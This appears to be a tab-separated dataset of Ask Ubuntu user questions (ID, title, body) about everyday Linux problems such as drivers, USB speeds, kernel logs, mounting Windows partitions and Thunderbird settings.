110264	how to find frames per second of any video file ?	is there any simple way to find the fps of a video in ubuntu ? in windows i use gspot to find out all the information about a video file . but in ubuntu i find it very difficult to find out this basic information . any help is appreciated .
110265	help running ubuntu on a usb / cd-rom	i am brand new to linux/ubuntu ; still a devoted win7 fan who is running linux from a usb just to play around with it . all i can say is wow ! but here 's what i want to do : i have a freind who has a old dell laptop , not sure if its running windows xp or vista ; but the o/s is all screwed up . now , what i 'd like to do is to pretty much give her a `` brand new computer '' in the form of ubuntu run from a usb flash drive or cd . this would give her full out-of-box functionality of her laptop while at the same time protecting all of her current user files . my questions : i would assume that using a large capacity usb would be the best way to go for docs , jpgs , mp3 , exe 's , etc . would a second usb stick be good for stand alone files ? exe 's would have to be on the drive containing the o/s ? ( i would also assume that in this case the best idea might be to get a full backup hdd ; even a solid state drive - but then again , backward compatibility for 7 yr old hardware ? ) since my own linux usb is brand new ; can i just simply make a copy of the .iso to another usb for her ; or would i have to again download the .iso and installer to her possibly corrupted windows o/s ? what i am seeing is that all she would have to do is to boot into her bios , select which o/s she wants to use ; in effect a brand new computer for the cost of a usb ...
110268	no response on ubuntu one support	i submitted a support question to ubuntuone-support @ canonical.com 6 days ago , received an automated response and nothing since . i have replied a few times looking for an update and nothing . this is very dis-heartening for a service that i am evaluating to pay for . is this typical or is there some issue at the moment that i am not aware of ?
110272	kernel panic on lenovo thinkpad w510 ubuntu 10.10	when i leave my lenovo thinkpad w510 laptop unattended it locks the screen as it is supposed to do . but when i come back i usually find the kernel panic going on on the laptop : the caps lock light is blinking and it prevents me from unlocking the screen , because i have keyboard layout switch assigned to caps lock . if i eventually manage to unlock the screen and log in , the caps lock light stops blinking in a few minutes . here is a part of dmesg : [ 1.877333 ] usb 1-1.3 : new full speed usb device using ehci_hcd and address 3 [ 1.957100 ] firewire_core : created device fw0 : guid f0def1ff0037d4ff , s400 [ 2.079469 ] usb 1-1.4 : new full speed usb device using ehci_hcd and address 4 [ 2.091158 ] sda1 sda2 sda3 sda4 < sda5 sda6 sda7 > [ 2.123535 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 2.286641 ] usb 1-1.6 : new high speed usb device using ehci_hcd and address 5 [ 2.525977 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 2.529184 ] ata2.00 : acpi cmd e3/00:1f:00:00:00 : a0 ( idle ) succeeded [ 2.529752 ] ata2.00 : acpi cmd e3/00:02:00:00:00 : a0 ( idle ) succeeded [ 2.531511 ] ata2.00 : atapi : optiarc dvd rw ad-7700h , 1.fa , max udma/100 [ 2.535236 ] ata2.00 : acpi cmd e3/00:1f:00:00:00 : a0 ( idle ) succeeded [ 2.536525 ] ata2.00 : acpi cmd e3/00:02:00:00:00 : a0 ( idle ) succeeded [ 2.538338 ] ata2.00 : configured for udma/100 [ 2.557568 ] scsi 1:0:0:0 : cd-rom optiarc dvd rw ad-7700h 1.fa pq : 0 ansi : 5 [ 2.559714 ] sr0 : scsi3-mmc drive : 62x/62x writer dvd-ram cd/rw xa/form2 cdda tray [ 2.559720 ] uniform cd-rom driver revision : 3.20 [ 2.559888 ] sr 1:0:0:0 : attached scsi cd-rom sr0 [ 2.559940 ] sr 1:0:0:0 : attached scsi generic sg1 type 5 [ 2.905267 ] ata5 : sata link down ( sstatus 0 scontrol 300 ) [ 3.274577 ] ata6 : sata link down ( sstatus 0 scontrol 300 ) [ 4.724933 ] ext4-fs ( sda5 ) : info : recovery required on readonly filesystem [ 4.724937 ] ext4-fs ( sda5 ) : write access will be enabled during recovery [ 6.659250 ] ext4-fs ( sda5 ) : orphan cleanup on readonly fs [ 6.659258 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059084 [ 6.659308 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059081 [ 6.659325 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059045 [ 6.659334 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059044 [ 6.659343 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 262692 [ 6.659353 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059043 [ 6.659362 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059042 [ 6.659370 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059040 [ 6.659379 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059034 [ 6.659387 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059032 [ 6.659396 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059036 [ 6.659412 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1058998 [ 6.659422 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1058984 [ 6.659430 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 262690 [ 6.659440 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 262689 [ 6.659453 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 262688 [ 6.659463 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 262687 [ 6.659475 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 262686 [ 6.659483 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 262356 [ 6.659492 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1058981 [ 6.659501 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1057421 [ 6.659516 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1059004 [ 6.659532 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1058882 [ 6.659553 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1058881 [ 6.659571 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 131135 [ 6.659586 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1322297 [ 6.659612 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1058909 [ 6.659622 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 1058908 [ 6.659631 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 135898 [ 6.659641 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 135897 [ 6.659650 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 135896 [ 6.659658 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 135888 [ 6.659668 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 135690 [ 6.659677 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 135109 [ 6.659685 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 135108 [ 6.659693 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 135106 [ 6.659702 ] ext4-fs ( sda5 ) : ext4_orphan_cleanup : deleting unreferenced inode 131136 [ 6.659709 ] ext4-fs ( sda5 ) : 37 orphan inodes deleted [ 6.659711 ] ext4-fs ( sda5 ) : recovery complete [ 6.885475 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 13.812093 ] udev [ 461 ] : starting version 163 [ 13.840692 ] adding 9854972k swap on /dev/sda7 . priority : -1 extents:1 across:9854972k [ 13.900874 ] intel ips 0000:00:1f.6 : warning : cpu tdp does n't match expected value ( found 25 , expected 35 ) [ 13.900898 ] intel ips 0000:00:1f.6 : pci int d - > gsi 19 ( level , low ) - > irq 19 [ 13.901069 ] intel ips 0000:00:1f.6 : failed to get i915 symbols , graphics turbo disabled [ 13.904358 ] linux video capture interface : v2.00 [ 13.914162 ] lp : driver loaded but no devices found [ 13.914542 ] cfg80211 : calling crda to update world regulatory domain [ 13.916635 ] uvcvideo : found uvc 1.00 device integrated camera ( 17ef:480f ) [ 13.920743 ] input : integrated camera as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0/input/input4 [ 13.920852 ] usbcore : registered new interface driver uvcvideo [ 13.920855 ] usb video class driver ( v0.1.0 ) [ 13.934341 ] xhci_hcd 0000:0f:00.0 : pci int a - > gsi 18 ( level , low ) - > irq 18 [ 13.934395 ] xhci_hcd 0000:0f:00.0 : setting latency timer to 64 [ 13.934400 ] xhci_hcd 0000:0f:00.0 : xhci host controller [ 13.934509 ] xhci_hcd 0000:0f:00.0 : new usb bus registered , assigned bus number 3 [ 13.934764 ] xhci_hcd 0000:0f:00.0 : irq 18 , io mem 0xf2200000 [ 13.938019 ] usb usb3 : no superspeed endpoint companion for config 1 interface 0 altsetting 0 ep 129 : using minimum values [ 13.938209 ] xhci xhci_add_endpoint called for root hub [ 13.938212 ] xhci xhci_check_bandwidth called for root hub [ 13.938247 ] hub 3-0:1.0 : usb hub found [ 13.938253 ] hub 3-0:1.0 : 4 ports detected [ 13.955469 ] intel ips 0000:00:1f.6 : ips driver initialized , mcp temp limit 65535 [ 13.960616 ] type=1400 audit ( 1319873044.396:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient3 '' pid=713 comm= '' apparmor_parser '' [ 13.961099 ] type=1400 audit ( 1319873044.396:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=713 comm= '' apparmor_parser '' [ 13.961467 ] type=1400 audit ( 1319873044.396:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=713 comm= '' apparmor_parser '' [ 14.000645 ] non-volatile memory driver v1.3 [ 14.007837 ] cfg80211 : world regulatory domain updated : [ 14.007840 ] ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 14.007843 ] ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.007845 ] ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.007847 ] ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.007849 ] ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.007852 ] ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.015075 ] bluetooth : core ver 2.15 [ 14.015099 ] net : registered protocol family 31 [ 14.015100 ] bluetooth : hci device and connection manager initialized [ 14.015103 ] bluetooth : hci socket layer initialized [ 14.021833 ] acpi device:03 : registered as cooling_device4 [ 14.022436 ] input : video bus as /devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/device:02/lnxvideo:00/input/input5 [ 14.022550 ] acpi : video device [ vid ] ( multi-head : yes rom : no post : no ) [ 14.026410 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 14.026586 ] usbcore : registered new interface driver btusb [ 14.028606 ] tpm_tis 00:0b : 1.2 tpm ( device-id 0x0 , rev-id 78 ) [ 14.088604 ] iwlagn : intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 14.088607 ] iwlagn : copyright ( c ) 2003-2010 intel corporation [ 14.088669 ] iwlagn 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 14.088677 ] iwlagn 0000:03:00.0 : setting latency timer to 64 [ 14.088733 ] iwlagn 0000:03:00.0 : detected intel ( r ) centrino ( r ) ultimate-n 6300 agn , rev=0x74 [ 14.098038 ] iwlagn 0000:03:00.0 : tunable channels : 13 802.11bg , 24 802.11a channels [ 14.098147 ] alloc irq_desc for 49 on node -1 [ 14.098149 ] alloc kstat_irqs on node -1 [ 14.098201 ] iwlagn 0000:03:00.0 : irq 49 for msi/msi-x [ 14.117713 ] thinkpad_acpi : thinkpad acpi extras v0.24 [ 14.117717 ] thinkpad_acpi : http : //ibm-acpi.sf.net/ [ 14.117719 ] thinkpad_acpi : thinkpad bios 6let66ww ( 1.31 ) , ec 6mht38ww-1.13 [ 14.117722 ] thinkpad_acpi : lenovo thinkpad w510 , model 43195ru [ 14.118787 ] thinkpad_acpi : detected a 8-level brightness capable thinkpad [ 14.119092 ] thinkpad_acpi : radio switch found ; radios are enabled [ 14.119295 ] hda intel 0000:00:1b.0 : pci int b - > gsi 17 ( level , low ) - > irq 17 [ 14.119418 ] alloc irq_desc for 50 on node -1 [ 14.119421 ] alloc kstat_irqs on node -1 [ 14.119437 ] hda intel 0000:00:1b.0 : irq 50 for msi/msi-x [ 14.119648 ] hda intel 0000:00:1b.0 : setting latency timer to 64 [ 14.123893 ] thinkpad_acpi : rfkill switch tpacpi_bluetooth_sw : radio is unblocked [ 14.124506 ] iwlagn 0000:03:00.0 : loaded firmware version 9.221.4.1 build 25532 [ 14.124691 ] registered led device : tpacpi : :thinklight [ 14.124757 ] registered led device : tpacpi : :power [ 14.124773 ] registered led device : tpacpi : :standby [ 14.124797 ] registered led device : tpacpi : :thinkvantage [ 14.129554 ] thinkpad_acpi : console audio control enabled , mode : monitor ( read only ) [ 14.132655 ] input : thinkpad extra buttons as /devices/platform/thinkpad_acpi/input/input6 [ 14.135704 ] phy0 : selected rate control algorithm 'iwl-agn-rs' [ 14.232488 ] hda intel 0000:01:00.1 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 14.232492 ] hda_intel : disable msi for nvidia chipset [ 14.232562 ] hda intel 0000:01:00.1 : setting latency timer to 64 [ 14.298673 ] nvidia : module license 'nvidia ' taints kernel . [ 14.298677 ] disabling lock debugging due to kernel taint [ 14.369097 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro [ 14.767385 ] synaptics touchpad , model : 1 , fw : 7.2 , id : 0x1c0b1 , caps : 0xd047b1/0xb40000/0xa0000 [ 14.767390 ] synaptics : clickpad mode enabled [ 14.767395 ] serio : synaptics pass-through port at isa0060/serio1/input0 [ 14.821060 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input7 [ 14.836294 ] type=1400 audit ( 1319873045.266:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/share/gdm/guest-session/xsession '' pid=1046 comm= '' apparmor_parser '' [ 14.836325 ] type=1400 audit ( 1319873045.266:6 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient3 '' pid=1047 comm= '' apparmor_parser '' [ 14.836818 ] type=1400 audit ( 1319873045.276:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1047 comm= '' apparmor_parser '' [ 14.837100 ] type=1400 audit ( 1319873045.276:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1047 comm= '' apparmor_parser '' [ 14.837391 ] type=1400 audit ( 1319873045.276:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1050 comm= '' apparmor_parser '' [ 14.837595 ] type=1400 audit ( 1319873045.276:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/tcpdump '' pid=1051 comm= '' apparmor_parser '' [ 14.838060 ] type=1400 audit ( 1319873045.276:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/evince '' pid=1048 comm= '' apparmor_parser '' [ 15.341206 ] bluetooth : l2cap ver 2.14 [ 15.341209 ] bluetooth : l2cap socket layer initialized [ 15.346444 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 15.346447 ] bluetooth : bnep filters : protocol multicast [ 15.349839 ] bluetooth : sco ( voice link ) ver 0.6 [ 15.349841 ] bluetooth : sco socket layer initialized [ 15.392224 ] e1000e 0000:00:19.0 : irq 47 for msi/msi-x [ 15.412427 ] bluetooth : rfcomm tty layer initialized [ 15.412433 ] bluetooth : rfcomm socket layer initialized [ 15.412435 ] bluetooth : rfcomm ver 1.11 [ 15.451953 ] e1000e 0000:00:19.0 : irq 47 for msi/msi-x [ 15.452602 ] addrconf ( netdev_up ) : eth0 : link is not ready uname -r : 2.6.35-22-generic is there any way to fix this ?
110274	can i sync bookmarks between firefox and chromium ?	so , firefox has turned so resource intensive that my netbook ca n't run it without making me want to pull my hair out . thus , i have been trying chromium with quite some success ( i have managed to find proper equivalents for my firefox plugins ) , the only thing i 'm lacking is my bookmarks , which are stored in my firefox sync account . point is i do n't want to use google bookmarks , mostly because of the whole thing with encryption . is there any way to use firefox sync with chromium ? , or is there any secure alternative ?
110277	mounting and enabling write access to windows drive	i wanted to auto-mount all the partitions in my system , ( i.e . the c , d , e and f drives from windows ) . i used ntfs config tool to do that , but it throws me an error when i check the mount selection for my c drive , the one that has windows installed on it . now , iâ´ve lost complete access to my windows partition , i can not open it in nautilus either , though i could do that before i used ntfs config tool . its throwing me this error error mounting : mount exited with exit code 1 : helper failed with : mount : according to mtab , /dev/sda1 is mounted on /media/windows\040 mount failed what should i do ? ? please help ! ! !
110281	will ubuntu tv run on pc 's ?	i searched askubuntu.com and google but unfortunately still am not sure . do you think that the final ubuntu tv software will also be available for everyone to be installed on ones pc 's ? just as os or a software on top of the normal ubuntu os ?
110283	can not open png files with imageviewer	when i try to open png files , i double click them , then nothing happens . i have to go to `` open with '' and select f-spot photoviewer to view png files . this is eog , eye of gnome , correct ? how can i troubleshoot the default image viewer ?
110291	how do i install drivers for an ati radeon hd6770m ?	how can i install ati radeon hd6770m drivers on ubuntu 11.10 ? . battery uses 100 % and notebook fans are all the time working 100 % . is there a posibility that this problem be solved until ubuntu 12.04 ? ?
110304	slow usb 3.0 speeds	long time forum forager , first time poster . i bought a toshiba 500 gb usb 3.0 hard drive last week and instantly ran home to see how fast i could push it . on my desktop ( that i built ) i was able to get 200 mb/sec . on my laptop ( msi fx something or other ) , which i dual boot windows 7/ubuntu 11.10 , i was able to get about 120 mb/sec on windows , but on ubuntu , i get about 25 mb/sec . lsusb shows : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 0bda:0139 realtek semiconductor corp . bus 002 device 003 : id 1532:0015 razer usa , ltd bus 004 device 002 : id 0480 : a007 toshiba america info . systems , inc. lspci -vvv shows that the usb 3.0 host controller is using the kernel driver in use is xhci_hcd . dmesg |grep usb shows : [ 1815.455368 ] usb 4-1 : new superspeed usb device number 2 using xhci_hcd [ 1815.475459 ] scsi7 : usb-storage 4-1:1.0 the built in disk utility says its connected via usb at 705 mb/s , but that 's not what it reports when i transfer files over to it . not really sure what to do at this point . any help would be very nice , thank you .
110306	can i use the logitech touch mouse m600 ?	can i use the logitech touch mouse m600 with ubuntu ? specifically , will the swipe and scroll capabilities work ? if not , can i still use it as a normal two-button mouse ? i do not want speculative answers . please cite a case in which this has actually been tested .
110314	why does a custom ppa offers to update gnome keyring ?	i installed this ppa only to add some control panel widget . but it suggests some updates i do n't expect from it . is this safe to install ?
110315	black screen on boot	i 've just installed ubuntu and i ca n't access the desktop because the screen sometimes flickers and sometimes it gets black . here are my pc specifications : gigabyte z68a-d3-b3 motherboard 4 gb kingston ram amd radeon hd 6850 graphics card intel i5 3.4 ghz processor ,
110318	can one define a keyboard shortcut to perform command on file selected in nautilus ?	say you 're looking at files in nautilus . is there some way to define a keyboard shortcut to execute command on the currently marked file ? for example , when i want to share photos , i 'm often browsing through a ton of pictures in nautilus , trying to find the ones to share . having a keyboard shortcut set to `` copy currently selected to .. folder '' would be very handy .
110319	how to use adobe 's pdf reader on chrome	i want to disable the pdf plugin built into google chrome , and use the official one by adobe . i was able to disable the built in plugin , i do n't know where to get the alternative plugin . where can i get it ?
110322	ubuntu 10.04.4 32 bit not detecting acer monitor	acer monitor al2216w 1680x1050 can not do anything execpt attach different monitor . this started happening after latest system update . reloaded ubuntu back on hard drive still did not help . took out one of my nvidia video cards and still nothing . attached different monitor and it detected that monitor and started working . i could log in and update the system , but switching back to old monitor still does n't detect . the monitor shows the bios screen has green light and then after cursor in the upper left cornor goes away the screen turns black and the button color turns to yellow . video cards are nvidia 8800gtx . currently only running 1 card but would like to go back to sli mode .
110326	ubuntu 11.10 , nvidia geforce 8400 gs driver support ?	i installed ubuntu 11.10 two weeks ago and i have been trying since then to install my graphic card but it does not seem to be working . help anyone ?
110328	screen flickering on dell latitude e6510 with intel graphics	i use this dell machine at work for extended periods and usually have it connected to a 23 '' external monitor . every now and then , a wavy flickering pattern appears on the screen and moves rapidly . it makes me dizzy as if i was on a boat at sea x ( it has the intel graphics on board and i have the opensource driver installed by default . i do n't think any propitiatory driver is available for this chip . linux mymachine 3.0.0-16-generic # 28-ubuntu smp fri jan 27 17:44:39 utc 2012 x86_64 x86_64 x86_64 gnu/linux this happens , or at least largely visible , on the external monitor . the image on laptop screen appears fine . i am sure the screen is in good working condition , i have double checked by trading my external monitor with a work mate and i can still see the issue on my screen . i only have ubuntu 11.04 on my laptop so i cant confirm that this is not a hardware issue with my motherboard . if there is anything that could help me identify the source of issue ( besides loading other os on it ) i would happily give it a shot . the graphic card is an onboard intel chip : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) let me know if i can add any more information to the question to help debug this issue .
110333	help editing grub on ubuntu 12.04	i 'm thinking about making a partition to test out mac os x on my own computer hard drive and do n't think it would suffice if i used it through vm . so , how would i go about returning to single boot ubuntu after i decided i did n't want the mac partition any more ? i already know how to make the partition and work gparted , but i have a few basic questions as well . how would i go about editing grub to do this ? i have `` startupmanager '' installed but i 'm not sure how do all this from the grub wiki in 12.04 ... edit 1 what am i to edit here :
110335	drawbacks of using preload ? why is n't it included by default ?	i would like to know what are the drawbacks of using preload ? if there would be no downside , preload would be enabled by default , so i guess there are some . okay you need a bit more ram , but most people have by far more ram then ubuntu needs - so what are the downsides of using preload ?
110339	thunderbird default account	whenever i reply or compose a new email in thunderbird , my personal account sends the email my default . i want to make it so that my school account is the default , but i do n't know how to set that . does anyone have any idea on how to fix it ? i 'm sure i 'm just missing a button or box to check . thanks all !
110341	how to blacklist kernel modules ?	how do i disable loading of unnecessary kernel modules . kernel 3.2.4
110347	command line clipboard access	i 'm building a command line tool in order to make some of my tasks more efficient . i need to be able to write content to the clipboard , but for some reason it 's not working for me . i 've tried installing both xclip and xsel , but both have the same behaviour : they can read/write to the clipboard fine , but i can not access it from the main ubuntu gui . i 've also tried it in the terminal ... echo `` hello '' | xclip then if ctrl+shift+v , i get my original clipboard entry , not `` hello '' . but , if i try to grab the content from xclip , it works fine . the main goal is get the content pastable into firefox or whatever other gui-based programs i 'm using . any help would be appreciated ! thanks
110348	how can i enable the pulseaudio equalizer ?	pulseaudio version 1.0 includes its own equalizer ( release notes ) , but it seems that it 's disabled in ubuntu 12.04 ( https : //bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/932834 ) . i know of the discontinued pulseaudio-equalizer app from webupd8.com , but it does n't work anymore in precise . how can i enable pulseaudio 's own system-wide equalizer ?
110355	alps touchpad driver loaded , but still touchpad not working ?	i have a dell inspiron 15r with ubuntu 11.10 x86-64 installed . i am having a problem with the alps touchpad . my touchpad 's driver loads , which is synaptics , and it gets recognized in xinput -- list and in xorg.0.log , but it 's still not working . in xinput -- list i can see two devices loaded at the same bus : `` ps/2 mouse '' and `` alps/ps2 alps glidepoint '' . any workaround and any further logs will be provided ( if ) when requested .
110364	what different desktop environments are available ?	i like to play with desktop environments and i know how to get kubuntu , xubuntu and gnome but i do n't know how to get any others . it would be great if someone could tell me about others and how to get them and is there an easy was to manage de 's and remove them ? thanks
110365	why ca n't i login after a hard reset ?	ubuntu boots normal , and i can even login in terminal at any tty ( tt1 ~ tty6 ) , but not in graphical mode . this happened after a power-suspend . as i was trying to resume after the system suspended due to a running low battery , and was n't getting my ubuntu back , i made a hard reset ( power button ) . i could not login anymore from that moment on .
110366	program of choice for making mac os x bootable usb ?	i 've tried to use unetbootin for it but sometimes unetbootin does n't exactly work right and i run into issues with the bios recognizing the bootloader on the usb . can anyone recommend programs for this ?
110369	would dualbooting windows mess up grub ?	i have ubuntu 12.04 as my main os , but have been thinking of doing some dualbooting , would making a partition specifically for windows and installing it to that partition mess with grub ? or would it be fine ?
110370	install ubuntu server using alternate iso from offline linux system	i want to install ubuntu server from my downloader alternate iso file for the ubuntu server , without rebooting my machine . in other word , i want to install it while i am still on a linux/ubuntu system . how can i do this ?
110371	how to correctly get right keyseq for readline in .inputrc ?	what i struggle with : i 'm configuring ~/.inputrc file to be same as mine custom emacs key-bindings and i 'm struggling very much with readline 's key sequences . what i mean by that is that if i want to set < up > / < down > , i have to set it to `` \e [ a '' / `` \e [ b '' how can i infer keyseq for < f1 > .. < f12 > or even if i want to bind something to let 's say ( kbd `` c-x < m-f7 > '' ) in emacs terminology ( ie : to [ control ] + [ x ] [ alt ] + [ f7 ] be one keyseq ) ? what i want : is there any command that tells me for certain key on keyboard what its escape sequence ? if there is n't any command , is there any other resource ( article/table/ ... ) with some hints ? -- > goal : replace < key sequence > with proper keyseq '' < f3 > '' : start-kbd-macro '' < s-f4 > '' : end-kbd-macro '' c-x < c-m-s-f4 > '' : dump-macro '' < f4 > '' : call-last-kbd-macro ... more keybindings ...
110378	help with zotac zbox nano ad10 mini pc ?	i have a zotac zbox nano ad10 . i have it connected to a samsung syncmaster t220hd monitor via a hdmi cable for audio and sound , everything else works apart from sound . i have tired ubuntu 11.04 , 11.10 , 12.04 beta 1 , linuxmint 12 , lubuntu 11.10 , and other linux distributions all with the same issue . on zotac 's website i do n't see any linux drivers to help the issue ? please help , thank you in advance to everyone . i have also tried to install windows 7 on this same computer and the audio works fine . it just does not want to work with linux .
110381	running on a usb / can i download ?	i am brand new to linux/ubuntu ; still a devoted win7 fan who is running linux from a usb just to play around with it . all i can say is wow ! but here 's what i want to do : i have a freind who has a old dell laptop , not sure if its running xp or vista ; but the o/s is all screwed up . now , what i 'd like to do is to pretty much give her a `` brand new computer '' in the form of ubuntu run from a stick or cd . this would give her full out-of-box functionality of her laptop while at the same time protecting all of her crrent user files . my questions : i would assume that using a good large capacity usb wuld be the best way to go for docs , jpgs , mp3 , exe 's , etc . would a second usb stick be good for stand-alone files ? exe 's would have to be on the drive containing the o/s ? ( i would also assume that in this case the best idea might be to get a full backup hdd ; even a solid state drive - but then again , backward compatibility for 7 yr old hardware ? ) since my own linux usb is brand new ; can o just simply make a copy of the .iso to another usb for her ; or would i have to again download the .iso and its installer directly to her possibly corrupted windows o/s ? what i am seeing is that all she would have to do is to boot into her bios , select which o/s she wants to use ; in effect a brand new computer for the cost of a usb ... also ; on my own 64 bit win7 system running ubuntu on an 8gb stick - it seems i ca n't download exe 's ?
110388	app service alternative to adobe flash media ( server & live encoder )	i am looking for an alternative to adobe flash media server and adobe flash media live encoder that can offer on the same hardware better performance , quality and overall performance/stability . i will be using a pinnacle video capturing device to capture the video and transfer it to the server . what alternative is available in ubuntu so i can replace the whole adobe system .
110391	how do you tell unity to startup in 2d and compatibility mode ?	how do you tell unity to startup in 2d and compatibility mode ? if you have to run a unity -- replace after startup it does n't kill the currently running unity and you end-up with two toolbars . one superimposed over the other . i would assume the best way to fix this is to have unity 2d start off in compatibility mode right off the bat .
110394	how do i install oracle 11gr2 ?	i need your valuable help and advise on installing oracle 11gr2 on ubuntu desktop edition 11.10 ( 64 bit ) . i was to install 11g which is normally installed on rhel or oel and not looking to install 11g client version . kindly help . if you are aware of any links please share the same . thanks
110398	computer turns off instead of suspending/sleeping	i recently assembled a new computer with the second generation intel core i7-2600k processor ( sandy bridge ) and solid state drive . the solid state drive is only 60 gb and i have lots of ram so i did no create a swap partition . ubuntu is installed on a guid partition and i 'm using efi boot if that 's relevant . my motherboard is the asus p8z68-v le and i currently have the automatic overclocking feature enabled . every thing seems to be working fine with this new system at the moment , except i can not put it to sleep . if i choose `` suspend '' in gnome 3 , the computer shuts off and i have trouble turning it on again . here 's what happens when i try to turn the computer on again after it fails to sleep : the first time i push the power button to turn it on again , my monitors wo n't turn on again and the system does n't do anything . at this point , i hold the power button to turn the computer off again . the second time i try to turn it on , the uefi ( bios ) beeps three times and i still do n't see anything on the monitors . i have to push and hold the power button again to get it to shut off . the third time i try and turn the computer on , it works okay . so far i have n't had any problem shutting the system down or booting it up . has any one else experienced this problem ? or could anyone point me in the right direction to find a solution ? thanks !
110400	using pysdm to change permissions	so i 'm trying to understand how to change permissions on an external drive . it seems like only 1 user can connect via the samba share . i 've read some things about installing pysdm , so beginners ( like myself ) do n't have to edit the /etc/fstab . would this be something i need to change the permissions to allow other users to access the external drive ?
